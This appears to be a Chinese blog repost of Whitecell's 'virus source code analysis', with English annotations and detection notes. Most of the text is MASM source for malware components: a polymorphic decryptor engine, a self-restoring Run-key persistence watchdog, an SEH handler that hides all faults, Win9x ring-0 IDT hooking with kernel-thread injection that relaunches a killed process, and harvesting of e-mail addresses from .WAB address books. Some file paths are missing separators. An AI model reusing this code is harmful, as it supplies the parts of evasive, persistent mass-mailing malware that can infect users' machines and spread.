
    病毒源碼解析之防御分析

    2019-09-06 23:33:18
    1、超級病毒變形引擎

    此段代碼會在DATA段內生成一個解密代碼。

    ;-----------------------------------------------------------------------
    ; Section 1: polymorphic decryptor generator -- analysis notes.
    ; MASM syntax, 32-bit flat model, STDCALL.
    ; Everything from DeCode to RndMima is assembled into .data, and @@Start
    ; ends with `jmp DeCode`, i.e. the program executes bytes out of its
    ; data section.  With DEP/NX enabled this faults at the first fetch; a
    ; page that is both writable and executable is itself a strong cue for
    ; scanners and EDR, as is the self-modifying write loop in @@Start.
    ;-----------------------------------------------------------------------
    .586p
    .model flat,STDCALL
    extrn ExitProcess: proc
    VirusSize=100h                  ; size in bytes of the block the generated loop walks (matches the 11h block below)
    .data

    DecodeMethod dd ?               ; records the step-2 variant used: 0 = xor [reg],imm32, 1 = add [reg],imm32 (set in @@Start)
    DeCode:
    pushad                          ; entered via `jmp DeCode`; saves the registers the generated code uses
    call Encode                     ; leaves the address of the 11h block on the stack -- the step-0 fragments read it from [esp]
    db 100h dup(11h)                ; VirusSize bytes of placeholder "encrypted" body
    Encode:
    db 100h dup(0cch)               ; buffer that receives the generated decryptor (initially all int 3)
    RndReg0 dd 0 ;eax               ; register index 0..3 (0=eax 1=ebx 2=ecx 3=edx, matching the Step*_* label order) holding the body pointer
    RndReg1 dd 0 ;ebx               ; register index for the byte counter; @@Start forces it to differ from RndReg0
    RndCode dd 0 ;Rnd Code          ; working value: rotated right one bit before each fragment is selected, bit 0 picks the variant
    RndMima dd 60932561 ;Rnd Password ; seed for RndCode and the immediate patched into the step-2 fragment

    .code
    ;-----------------------------------------------------------------------
    ; @@Start -- builds one decryptor instance into the Encode buffer and
    ; then runs it.
    ; Register use: edi = write cursor in Encode, esi = current template
    ; fragment, ebx = address of the first loop instruction (jcc target),
    ; eax/ecx scratch.
    ; Six fragments are selected with GetBxCode and copied byte by byte up
    ; to and including their 0cch terminator; `dec edi` then lets the next
    ; fragment overwrite that terminator.  Generated code, in pseudo-asm:
    ;     regA = [esp]            ; step 0, body pointer left by `call Encode`
    ;     regB = VirusSize        ; step 1, byte counter
    ;   L: op [regA],RndMima      ; step 2, xor or add (recorded in DecodeMethod)
    ;     regA += 4               ; step 3
    ;     regB -= 4               ; step 4
    ;     jcc L                   ; step 5, rel8 patched below
    ;     ret
    ; Analysis note: instances differ in register choice and in the
    ; arithmetic/jump forms, so byte signatures over the output are weak;
    ; the generator itself and the fragment table in GetBxCode are the
    ; stable parts to match on.
    ;-----------------------------------------------------------------------
    @@Start:
    mov eax,RndMima
    ror eax,7                       ; RndCode = RndMima ror 7
    mov RndCode,eax

    mov eax,RndCode
    mov ecx,eax
    and eax,011b                    ; RndReg0 = low two bits (register index 0..3)
    mov RndReg0,eax
    xor ecx,RndMima
    and ecx,011b                    ; candidate for RndReg1
    cmp eax,ecx
    jnz short ChooseRegOk
    inc ecx                         ; collides with RndReg0: take the next index, wrapping at 4
    and ecx,011b
    ChooseRegOk:
    mov RndReg1,ecx


    mov edi,offset Encode           ; output cursor

    ror RndCode,1                   ; new low bit for this fragment's variant
    call GetBxCode,0,RndReg0,RndCode ; step 0: regA = [esp]
    mov esi,eax
    ContFillStep0:
    cld
    lodsb
    stosb                           ; copy through the 0cch terminator ...
    cmp al,0cch
    jnz ContFillStep0
    dec edi                         ; ... and back up so the next fragment overwrites it

    ror RndCode,1
    call GetBxCode,1,RndReg1,RndCode ; step 1: regB = VirusSize
    mov esi,eax
    ContFillStep1:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep1
    dec edi

    mov ebx,edi ;// loop start: used below to compute the jcc displacement

    ror RndCode,1
    call GetBxCode,2,RndReg0,RndCode ; step 2: xor/add [regA],imm32 (placeholder immediate)
    mov esi,eax
    ContFillStep2:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep2
    dec edi

    mov eax,RndMima
    mov [edi-4],eax ;// fill in the random key: the imm32 is the last 4 bytes of the fragment just copied
    mov eax,RndCode
    and eax,01
    mov DecodeMethod,eax ;// fill in the DeCode method: bit 0 of RndCode is the variant GetBxCode just selected (0 = xor, 1 = add)

    ror RndCode,1
    call GetBxCode,3,RndReg0,RndCode ; step 3: regA += 4
    mov esi,eax
    ContFillStep3:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep3
    dec edi

    ror RndCode,1
    call GetBxCode,4,RndReg1,RndCode ; step 4: regB -= 4
    mov esi,eax
    ContFillStep4:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep4
    dec edi

    ror RndCode,1
    call GetBxCode,5,RndReg0,RndCode ; step 5: conditional jump back to the loop start
    mov esi,eax
    ContFillStep5:
    cld
    lodsb
    stosb
    cmp al,0cch
    jnz ContFillStep5
    dec edi

    mov al,0c3h
    mov [edi],al ;// fill in the ret instruction (edi = byte right after the jcc)

    sub ebx,edi                     ; rel8 = loop start - address following the jcc
    mov [edi-1],bl ;// fill in the jmp displacement (the jcc's rel8 byte)

    int 3; debugger break before the generated code is run

    jmp DeCode                      ; DeCode: pushad, call Encode -> runs the fresh decryptor over the 11h block
    ret
    ;-----------------------------------------------------------------------
    ; GetBxCode(Step, Reg, Rnd) -> eax = address of one template fragment.
    ; The fragment table is the code that follows `call GetBxCodeAddr`:
    ; 6 steps x 4 registers x 2 variants, each terminated by an `int 3`
    ; whose byte (0cch) serves only as a separator.
    ; Index = ((Step*4 + Reg)*2 + (Rnd and 1)); GetBxCodeAddr skips that
    ; many separators and returns the byte after the last one (the table
    ; start for index 0).  Invariant the table relies on: no fragment may
    ; contain a 0cch byte other than its terminator.
    ; Preserves ebx/ecx/edx/esi/edi (uses list); writes the local Rnd copy.
    ; The fragments are never executed here -- they are data for @@Start.
    ;-----------------------------------------------------------------------
    GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
    call GetBxCodeAddr              ; pushes the table start (Step0_Eax) as the return address
    Step0_Eax:                      ; step 0: reg = [esp] (body pointer pushed by `call Encode`); two variants per register
    mov eax,[esp]
    int 3;
    pop eax
    push eax
    int 3;
    Step0_Ebx:
    pop ebx
    push ebx
    int 3;
    push dword ptr[esp]
    pop ebx
    int 3;
    Step0_Ecx:
    mov ecx,[esp]
    int 3;
    pop ecx
    push ecx
    int 3;
    Step0_Edx:
    mov edx,[esp]
    int 3;
    mov edx,esp
    mov edx,[edx]
    int 3

    Step1_Eax:                      ; step 1: reg = VirusSize, written as obfuscated arithmetic (net value is the same in every variant)
    mov eax,VirusSize
    int 3
    sub eax,eax
    add ax,VirusSize+3081h
    sub ax,3081h
    int 3
    Step1_Ebx:
    mov ebx,VirusSize
    int 3;
    xor ebx,ebx
    or bx,VirusSize
    int 3;
    Step1_Ecx:
    sub ecx,ecx
    xor ecx,(VirusSize xor 3181h)
    xor ecx,(3181h)
    int 3;
    mov ecx,0
    and cx,VirusSize
    int 3
    Step1_Edx:
    and edx,0
    xor dx,(VirusSize-0281h)
    add dx,0281h
    int 3;
    xor edx,edx
    sub edx,(0181h-VirusSize)
    sub edx,-0181h
    int 3;

    Setp2_Eax:                      ; step 2 ("Setp" is the original label spelling): op [reg],imm32; 12345678h is a placeholder @@Start overwrites with RndMima
    xor [eax],12345678h
    int 3
    add [eax],12345678h
    int 3
    Setp2_Ebx:
    xor [ebx],12345678h
    int 3;
    add [ebx],12345678h
    int 3;

    Setp2_Ecx:
    xor [ecx],12345678h
    int 3;
    add [ecx],12345678h
    int 3;
    Setp2_Edx:
    xor [edx],12345678h
    int 3;
    add [edx],12345678h
    int 3;
    Step3_Eax:                      ; step 3: reg += 4 (advance the body pointer by one dword)
    add eax,4
    int 3
    inc eax
    inc eax
    inc eax
    inc eax
    int 3;
    Step3_Ebx:
    add ebx,5
    dec ebx
    int 3
    add ebx,2
    add ebx,2
    int 3;
    Step3_Ecx:
    sub ecx,-4
    int 3
    sub ecx,-5
    dec ecx
    int 3;
    Step3_Edx:
    inc edx
    sub edx,-3
    int 3
    add edx,04
    int 3;

    Step4_Eax:                      ; step 4: reg -= 4 (count down the byte counter); some variants use 16-bit forms
    sub eax,4
    int 3
    dec eax
    dec eax
    dec eax
    sub eax,1
    int 3;
    Step4_Ebx:
    dec ebx
    sub ebx,3
    int 3;
    dec ebx
    dec ebx
    sub ebx,2
    int 3;
    Step4_Ecx:
    add cx,123
    sub cx,123+4
    int 3
    sub cx,-4
    dec cx
    sub cx,7
    int 3
    Step4_Edx:
    sub dx,2
    dec dx
    sub dx,1
    int 3
    inc edx
    sub dx,5
    int 3;
    Step5_Eax:                      ; step 5: conditional jump on the flags left by step 4; `$` is a placeholder rel8 that @@Start patches. The register index only selects which pair of jcc forms is used
    jnz $
    int 3
    ja $
    int 3
    Step5_Ebx:
    jg $
    int 3
    jnb $
    int 3
    Step5_Ecx:
    jnl $
    int 3
    jnz $
    int 3
    Step5_Edx:
    ja $
    int 3
    jg $
    int 3

    GetBxCodeAddr:
    pop esi                         ; esi = table start (the return address pushed by the call above)
    mov al,0cch ;// instruction separator byte
    mov ecx,Step
    shl ecx,1
    shl ecx,1                       ; Step*4
    add ecx,Reg ;// computed position of the wanted (step, register) pair
    shl ecx,1                       ; two variants per pair
    and Rnd,01b                     ; only bit 0 of the caller's copy is used
    add ecx,Rnd                     ; ecx = number of separators to skip
    jcxz short GetBxCodeOver        ; index 0: the table start itself
    ContFindCode:
    push ecx
    ContFindCC:
    inc esi
    cmp [esi],al                    ; scan for the next 0cch
    jnz ContFindCC
    pop ecx
    loop ContFindCode
    mov eax,esi
    inc eax                         ; first byte after the last separator skipped
    ret
    GetBxCodeOver:
    mov eax,esi
    ret
    GetBxCode endp


    end @@Start


    2、Windows 9x/2000/xp 鎖定注冊表

    ;-----------------------------------------------------------------------
    ; Section 2: Run-key persistence guarded by a watchdog thread --
    ; analysis notes.
    ; NOTE(review): the path separators in HKeyStr are missing as shown on
    ; this page (presumably stripped when the article was rendered); the
    ; name components are those of the HKLM CurrentVersion Run autostart
    ; key.  Writes to that key are a standard audit/EDR cue.
    ;-----------------------------------------------------------------------
    .586p
    .model flat,STDCALL
    .data

    HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0 ; subkey opened under 080000002h (HKEY_LOCAL_MACHINE) in start
    ValueName db 'wap32',0          ; value name written into the Run key
    PathName db 'wap32.exe',0       ; value data: the program to autostart

    .code

    extrn RegOpenKeyA: proc
    extrn RegSetValueExA: proc
    extrn RegCloseKey: proc
    extrn ExitProcess: proc
    extrn RegNotifyChangeKeyValue: proc
    extrn CreateThread: proc
    extrn Sleep: proc
    extrn RegQueryValueExA: proc

    ;-----------------------------------------------------------------------
    ; start -- entry point.  Writes ValueName=PathName under the Run key,
    ; reads it back, starts RegProtectProc as a thread that re-writes the
    ; value whenever it changes, sleeps 3 minutes and returns.
    ; Register use: ebx = hKey (also the thread parameter), eax scratch.
    ; The MASM `call proc,args` form pushes arguments right to left, so an
    ; `esp` argument is the address of the slot pushed just before the call
    ; (phkResult / lpcbData / lpThreadId below).
    ; Defender notes: clean-up must stop the process (and so the watchdog
    ; thread) before deleting the Run value, otherwise it is restored.
    ; NOTE(review): with no CRT, returning from the entry thread does not by
    ; itself end the process while the watchdog thread runs -- confirm on
    ; the target OS.
    ;-----------------------------------------------------------------------
    start:
    push eax                        ; reserve the phkResult slot
    call RegOpenKeyA,080000002h,offset HKeyStr,esp ; HKEY_LOCAL_MACHINE, HKeyStr, &slot
    pop ebx                         ; ebx = opened key handle
    call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h ; type 1 = REG_SZ, cbData = 100h

    sub esp,100h                    ; 100h-byte read-back buffer
    mov eax,esp
    push 100h                       ; lpcbData slot (in/out size)
    call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
    pop eax                         ; eax = returned size (not used afterwards)
    add esp,100h

    push eax                        ; lpThreadId slot
    call CreateThread,0,0,offset RegProtectProc,ebx,0,esp ; thread parameter = hKey
    pop eax
    call Sleep,1000*60*3            ; 3 minutes
    ret

    ;-----------------------------------------------------------------------
    ; RegProtectProc(hKey) -- watchdog thread body; never returns.
    ; Reads the current 'wap32' value into a stack buffer, then loops:
    ; block in RegNotifyChangeKeyValue (filter 4 = REG_NOTIFY_CHANGE_LAST_SET,
    ; synchronous) and re-write the value from the saved buffer.  The value
    ; name is obtained with a call/pop trick: the bytes after `call` are
    ; the string itself.
    ; Register use: ebx = hKey, esi = name string, edi = value buffer.
    ; Detection note: a thread parked in RegNotifyChangeKeyValue on the Run
    ; key that immediately re-sets a value is the observable signature of
    ; this guard; deleting the value without stopping the process first
    ; only triggers the re-write.
    ;-----------------------------------------------------------------------
    RegProtectProc proc hKey:dword
    mov ebx,hKey
    sub esp,100h                    ; value buffer
    mov edi,esp
    call GetProtectKeyName          ; pushes the address of the string below
    db 'wap32',0
    GetProtectKeyName:
    pop esi                         ; esi -> 'wap32'
    push 100h                       ; lpcbData slot
    call RegQueryValueExA,ebx,esi,0,0,edi,esp
    pop eax
    WaitRegChangeNotify:
    call RegNotifyChangeKeyValue,ebx,0,4,0,0 ; returns when a value under hKey is set (hEvent 0, fAsync 0)
    call RegSetValueExA,ebx,esi,0,01,edi,100h ; restore the saved value (type 1 = REG_SZ)
    jmp short WaitRegChangeNotify
    RegProtectProc endp

    end start



    3、 Windows 9x/2000 意外處理通用程序


    此段程序可以達到屏蔽程序錯誤的效果

    include wap32.inc

    ;-----------------------------------------------------------------------
    ; Section 3: SEH frame that swallows any exception -- analysis notes.
    ; The D/W size macros and the cx_Eip CONTEXT field used below are not
    ; defined on this page (presumably from wap32.inc).  SetSehFrame,
    ; ClearSehFrame, Exception and GetEspAddr are assembled into .data, not
    ; .code, so the handler executes from a data page (DEP/NX would fault).
    ; A handler that returns ExceptionContinueExecution unconditionally
    ; hides faults from the user and from crash-reporting tooling.
    ;-----------------------------------------------------------------------
    .386p
    .model flat,stdcall

    extrn MessageBoxA: proc
    extrn ExitProcess: proc

    .data

    Msg db 'Fuck',0                 ; text and caption for the MessageBoxA call in Start

    ;-----------------------------------------------------------------------
    ; SetSehFrame / ClearSehFrame -- install and remove an SEH frame whose
    ; handler is the `jmp short Exception` stub, remembering the esp at
    ; install time in the dd slot GetEspAddr points at.
    ; Call SetSehFrame with ecx = address to resume at when a fault occurs.
    ; Both routines pop their own return address into eax and leave with
    ; `jmp eax`, so they do not behave like ordinary call/ret pairs.
    ; Stack after SetSehFrame (top first): previous saved-esp value,
    ; previous fs:[0], handler address, resume address.
    ;-----------------------------------------------------------------------
    SetSehFrame: ;ecx = address to resume at after the error is ignored
    pop eax ;pop the return address
    push ecx ;save the resume address
    call PushExceptionProc          ; pushes the address of the `jmp short Exception` stub = handler address
    jmp short Exception
    PushExceptionProc:
    push fs:dword ptr[0]            ; link the previous frame
    mov fs:[0],esp                  ; register {prev, handler} as the current SEH frame
    call GetEspAddr                 ; edx -> saved-esp slot
    push D [edx] ;save the previous saved-esp value
    mov [edx],esp
    jmp eax                         ; return to SetSehFrame's caller
    ClearSehFrame:
    pop eax ;pop the return address
    call GetEspAddr
    mov esp,[edx]                   ; back to the stack as it was right after the frame was installed
    pop D [edx] ;restore the previous saved-esp value
    pop fs:dword ptr[0]             ; unlink the frame
    pop ecx                         ; discard the handler address
    pop ecx ;ecx = the resume address
    jmp eax

    ;-----------------------------------------------------------------------
    ; Exception(pRecord, pFrame, pContext, pDispatch) -- the SEH handler.
    ; For any exception it sets the faulting context's Eip to the
    ; `call ClearSehFrame` below and returns 0 (ExceptionContinueExecution).
    ; The return happens inside PushSehBackProc; MASM presumably expands
    ; that `ret` to the proc epilogue.  When the OS resumes the thread,
    ; ClearSehFrame unwinds the frame, leaves the resume address in ecx and
    ; `jmp ecx` continues the program as if nothing happened.
    ;-----------------------------------------------------------------------
    Exception proc pRecord,pFrame,pContext,pDispatch
    call PushSehBackProc            ; pushes the address of the next line -- the new Eip
    call ClearSehFrame              ; reached only through the patched context Eip
    jmp ecx                         ; ecx = resume address popped by ClearSehFrame
    PushSehBackProc:
    pop ecx                         ; ecx = address of `call ClearSehFrame`
    mov eax,pContext
    mov [eax.cx_Eip],ecx            ; redirect the faulting thread there (cx_Eip = CONTEXT Eip field, definition not shown)
    xor eax,eax ;0 = ExceptionContinueExecution: ignore the error and continue
    ret                             ; back to the exception dispatcher
    Exception endp

    ;-----------------------------------------------------------------------
    ; GetEspAddr -- returns edx = address of the dd slot embedded below
    ; (call/pop trick: the return address pushed by `call` is the slot).
    ; Clobbers edx only.
    ;-----------------------------------------------------------------------
    GetEspAddr:
    call PushOffsetEspAddr
    dd ?                            ; storage for the saved esp (lives in .data, so it is writable)
    PushOffsetEspAddr:
    pop edx
    ret


    .code

    ;-----------------------------------------------------------------------
    ; Start -- demo: install the frame, fault on purpose, show the box.
    ; PushErrorProc pops its own return address (the `call MessageBoxA`
    ; line) into ecx as the resume address, installs the frame and writes
    ; to address 0.  The access violation is swallowed by Exception and
    ; execution lands at `call MessageBoxA`; the `call ClearSehFrame` /
    ; `ret` after the faulting store run only if the store did not fault.
    ;-----------------------------------------------------------------------
    Start:
    call PushErrorProc
    call MessageBoxA,0,offset Msg,offset Msg,0 ; resume point after the fault
    ret
    PushErrorProc:
    pop ecx                         ; ecx = resume address (the call above)
    call SetSehFrame
    mov ds:[0],eax                  ; deliberate access violation (write to address 0)
    call ClearSehFrame
    ret


    end Start



    4、Windows 9x 下進程不死術

    此段程序首先實現Win9x下注射遠程線程(新技術)
    然后與Win2k下進程不死術一樣了。
    include Win32.inc

    .386p
    .model flat,stdcall

    extrn GetProcAddress: proc
    extrn WinExec: proc
    extrn MessageBoxA: proc
    extrn Sleep: proc
    extrn GetCurrentProcessId: proc
    extrn OpenProcess: proc
    extrn GetCurrentProcess: proc
    extrn WriteProcessMemory: proc
    extrn GetExitCodeProcess: proc

    .data

    ;問題,要Sleep()這樣做使Kernel32有機會更新數據
    ;-----------------------------------------------------------------------
    ; KnlThread(ProcID) -- position-independent routine intended to run
    ; outside this process (Start copies 100h bytes into the Kernel32 image
    ; region and starts that copy with the undocumented Win9x
    ; CreateKernelThread).  It keeps no absolute references: the three API
    ; pointers are dd cells embedded in the code (filled in by Start) and
    ; fetched with call/pop, and the FileName address is computed relative
    ; to GetFileNameAddress.
    ; Behaviour: OpenProcess(ProcID) with full access, WaitForSingleObject
    ; on it (-1 = INFINITE), then WinExec(FileName, 1 = SW_SHOWNORMAL) --
    ; i.e. relaunch the program once it has been terminated.
    ; Defender note: Win9x only; the fixed 0bff70000h Kernel32 base and the
    ; writable IDT used by MoveDataToKnl do not exist on NT-family Windows.
    ; Register use: eax = API pointer / handle, ebx = process handle,
    ; ecx = FileName pointer.
    ;-----------------------------------------------------------------------
    KnlThread proc ProcID:dword
    call GetKnlOpenProcess          ; pushes the address of the cell below
    KnlOpenProcess dd ?             ; OpenProcess address, written by Start
    GetKnlOpenProcess:
    pop eax
    call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
    or eax,eax
    jz short ExitProtectProc        ; could not open the watched process
    mov ebx,eax
    call GetKnlWaitForSingleObject
    KnlWaitForSingleObject dd ?     ; WaitForSingleObject address, written by Start
    GetKnlWaitForSingleObject:
    pop eax
    call [eax],ebx,-1h              ; wait until the process ends (INFINITE)
    call GetFileNameAddress
    GetFileNameAddress:
    pop ecx                         ; ecx = run-time address of this label
    add ecx,offset FileName-offset GetFileNameAddress ; relocate to FileName wherever the code was copied
    call GetKnlWinExec
    KnlWinExec dd ?                 ; WinExec address, written by Start
    GetKnlWinExec:
    pop eax
    call [eax],ecx,01               ; WinExec(FileName, SW_SHOWNORMAL)
    ExitProtectProc:
    ret
    KnlThread endp

    FileName db 'c:wap32.exe',0     ; program relaunched by KnlThread (NOTE(review): a path separator appears to be missing in this copy of the page)

    KnlOpenProcessStr db 'OpenProcess',0          ; names resolved by Start with GetProcAddress against Kernel32 at 0bff70000h
    KnlWaitForObjectStr db 'WaitForSingleObject',0
    KnlWinExecStr db 'WinExec',0
    KnlSleepStr db 'Sleep',0                      ; declared but not referenced in the code shown
    KnlCreateKnlThreadStr db 'CreateKernelThread',0 ; undocumented Win9x Kernel32 export

    .code

    ;-----------------------------------------------------------------------
    ; Start -- entry point (Win9x).  Resolves the three imports KnlThread
    ; needs from Kernel32 at its fixed Win9x base 0bff70000h and stores
    ; them in the dd cells inside KnlThread, copies 100h bytes from Start
    ; into the Kernel32 image at 0bff70600h through the ring-0 path in
    ; MoveDataToKnl, starts a kernel thread at that address with the
    ; current process id as parameter, and shows a message box.
    ; Defender notes: a hard-coded module base, a write into a shared
    ; system image and an import of CreateKernelThread are each a clear
    ; indicator; none of this works on NT-family Windows.
    ;-----------------------------------------------------------------------
    Start:
    call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
    mov KnlOpenProcess,eax          ; patch the cell inside KnlThread
    call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
    mov KnlWaitForSingleObject,eax
    call GetProcAddress,0bff70000h,offset KnlWinExecStr
    mov KnlWinExec,eax

    call MoveDataToKnl,offset Start,0bff70600h,100h ; Src = Start, Des = Kernel32 base + 600h, 100h bytes

    call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
    mov ebx,eax                     ; ebx = CreateKernelThread
    call GetCurrentProcessId
    push eax                        ; thread-id slot; eax (pid) is also passed as the thread parameter
    call ebx,0,0,0bff70000h+600h,eax,0,esp ; start address = the copied code
    pop eax
    call MessageBoxA,0,offset FileName,offset FileName,0
    ret

    ;-----------------------------------------------------------------------
    ; MoveDataToKnl(Src, Des, nCx) -- copies nCx bytes to Des at ring 0.
    ; Mechanism: read the IDT base with sidt (placed so the 4-byte base
    ; lands at [esp]), save the int 3 gate (entry 3), overwrite the gate's
    ; offset halves with the address of the `pushad` below (taken from the
    ; return address of `call SetIdt03`), raise int 3 to enter ring 0
    ; there, restore the original gate, copy with rep movsb, and iret back
    ; to ring 3.
    ; Register use: eax = IDT entry address, ebx/edx = saved gate,
    ; esi/edi/ecx = copy operands.  The uses list restores ebx/esi/edi;
    ; eax and edx are clobbered.
    ; Defender note: this needs an IDT that user mode can write and a
    ; gate that lands in user-mode code, which holds only on Win9x.  On
    ; NT-family kernels the write faults; sidt from user mode is still a
    ; common sandbox/VM-detection cue worth flagging.
    ;-----------------------------------------------------------------------
    MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
    push eax                        ; scratch dword so sidt's 6 bytes fit at [esp-2..esp+3]
    sidt [esp-2]                    ; limit at [esp-2], base at [esp]
    pop eax                         ; eax = IDT base
    add eax,3*8                     ; eax -> descriptor for int 3
    mov ebx,[eax]                   ; save the original 8-byte gate
    mov edx,[eax+4]
    call SetIdt03                   ; pushes the address of `pushad` = new gate offset
    pushad                          ; ---- ring 0 from here, entered through int 3 ----
    mov [eax],ebx                   ; put the original gate back first
    mov [eax+4],edx
    cld
    rep movsb                       ; the copy into the kernel region
    popad
    iret                            ; back to ring 3 at the `sti` below
    SetIdt03:
    cli
    pop W[eax]                      ; low word of the return address -> gate offset bits 15..0
    pop W[eax+6]                    ; high word -> gate offset bits 31..16 (selector/type bytes untouched)
    mov esi,Src
    mov edi,Des
    mov ecx,nCx
    int 3; enter the hooked gate
    sti
    ret
    MoveDataToKnl endp

    end Start


    5、簡單算法,高效率壓縮PE文件

    ;-----------------------------------------------------------------------
    ; Section 5: zero-run compression -- analysis notes.
    ; Encoding produced by start: every non-zero byte is copied through; a
    ; run of zeros is emitted as the two bytes 00h, count (count 1..0ffh,
    ; longer runs split).  A lone 00h never appears in the output, which is
    ; what makes the stream decodable.
    ;-----------------------------------------------------------------------
    .586p
    .model flat,STDCALL
    .data

    OldFile db 'pe.exe',0           ; input file
    NewFile db 'pe.zzz',0           ; output file

    FileData db 0,0                 ; one-byte read buffer; the second byte is used when a (00h, count) pair is written
    .code
    extrn _lopen: proc,_lcreat: proc
    extrn _lread: proc,_lwrite: proc
    extrn _lclose: proc
    extrn ExitProcess: proc
    ;-----------------------------------------------------------------------
    ; start -- entry point.  esi = input handle, edi = output handle,
    ; ebx = pending zero count.  Reads the input one byte per _lread call,
    ; writes with _lwrite, closes both handles and exits.
    ; Error handling: HFILE_ERROR (-1) from _lopen skips everything; from
    ; _lcreat it closes the input first.
    ;-----------------------------------------------------------------------
    start:
    call _lopen,offset OldFile,0    ; 0 = OF_READ
    cmp eax,-1
    jz ExitProc
    mov esi,eax
    call _lcreat,offset NewFile,0
    cmp eax,-1
    jz CloseOldFile
    mov edi,eax

    xor ebx,ebx                     ; no zeros pending
    ReadData:
    call _lread,esi,offset FileData,1
    or eax,eax                      ; 0 bytes read = end of input
    jz short ReadOver
    movzx eax,FileData
    or eax,eax
    jnz short NoZero
    inc ebx                         ; another zero: count it
    cmp ebx,0ffh
    jnz short ReadData
    xor eax,eax                     ; run at its maximum: emit (00h, 0ffh) now
    mov ah,bl
    xchg ax,word ptr FileData       ; FileData = 00h, count (little-endian word)
    call _lwrite,edi,offset FileData,2
    xor ebx,ebx
    jmp short ReadData
    NoZero:
    or ebx,ebx
    jnz short NoZeroData
    call _lwrite,edi,offset FileData,1 ; plain byte, nothing pending
    jmp short ReadData
    NoZeroData:
    push eax                        ; keep the byte just read
    xor eax,eax
    mov ah,bl                       ; (00h, count) for the zeros that preceded it
    mov word ptr FileData,ax
    call _lwrite,edi,offset FileData,2
    xor ebx,ebx
    pop eax
    mov FileData,al                 ; then the byte itself
    call _lwrite,edi,offset FileData,1
    jmp ReadData
    ReadOver:
    or ebx,ebx                      ; flush a trailing zero run
    jz short CloseFile
    xor eax,eax
    mov ah,bl
    xchg ax,word ptr FileData
    call _lwrite,edi,offset FileData,2
    xor ebx,ebx
    CloseFile:
    call _lclose,edi
    CloseOldFile:
    call _lclose,esi
    ExitProc:
    call ExitProcess,0

    end start

    6、提取Windows地址薄文件(*.WAB)的Email信息

    ;-----------------------------------------------------------------------
    ; Section 6: read e-mail names out of a Windows Address Book file --
    ; analysis notes.  A process other than the address-book or mail
    ; client opening *.WAB files is a classic mass-mailer indicator worth
    ; alerting on.  The header offsets used in start (60h = table offset,
    ; 64h = entry count, 44h-byte wide-char records) are what this code
    ; expects of the file and are not validated.
    ;-----------------------------------------------------------------------
    .586p
    .model flat,STDCALL
    .data

    MailFile db 'My.WAB',0          ; address-book file opened read-only by start

    .code

    extrn _lopen: proc,_lcreat: proc
    extrn _lread: proc,_lwrite: proc
    extrn _llseek: proc
    extrn _lclose: proc
    extrn MessageBoxA: proc
    extrn ExitProcess: proc
    extrn WideCharToMultiByte: proc

    ;-----------------------------------------------------------------------
    ; start -- entry point.  ebx = file handle, edi = 100h-byte stack
    ; buffer holding first the header and then each record, ecx = records
    ; left.  Reads the header, seeks to the table at [header+60h], then for
    ; [header+64h] records reads 44h bytes, converts the wide string to
    ; multibyte into a second stack buffer and shows it in a message box.
    ; NOTE(review): the `cmp eax,44` after the record read is not followed
    ; by a branch, so its result is discarded (and 44 decimal differs from
    ; the 44h read size).  The header buffer is never released before
    ; ExitProcess.
    ;-----------------------------------------------------------------------
    start:
    call _lopen,offset MailFile,0   ; 0 = OF_READ
    cmp eax,-1
    jz short ExitProc
    mov ebx,eax
    sub esp,100h                    ; header / record buffer
    mov edi,esp
    call _lread,ebx,edi,100h
    cmp eax,100h                    ; require the full header
    jnz short CloseFile
    mov eax,[edi+60h] ;offset of the Unicode mail-name table
    call _llseek,ebx,eax,0          ; 0 = FILE_BEGIN
    mov ecx,[edi+64h] ;number of Unicode mail-name entries
    ContWabMail:
    push ecx                        ; preserve the loop counter across the calls
    call _lread,ebx,edi,44h ;read one record
    cmp eax,44                      ; result unused (see note above)
    sub esp,100h                    ; conversion buffer
    mov eax,esp
    call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0 ; 0 = CP_ACP, flags 200h, -1 = null-terminated source
    mov eax,esp
    call MessageBoxA,0,eax,eax,0
    add esp,100h
    pop ecx
    loop short ContWabMail
    CloseFile:
    call _lclose,ebx
    ExitProc:
    call ExitProcess,0

    end start



    WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
    WSS 主頁:http://www.whitecell.org/
    WSS 論壇:http://www.whitecell.org/forum/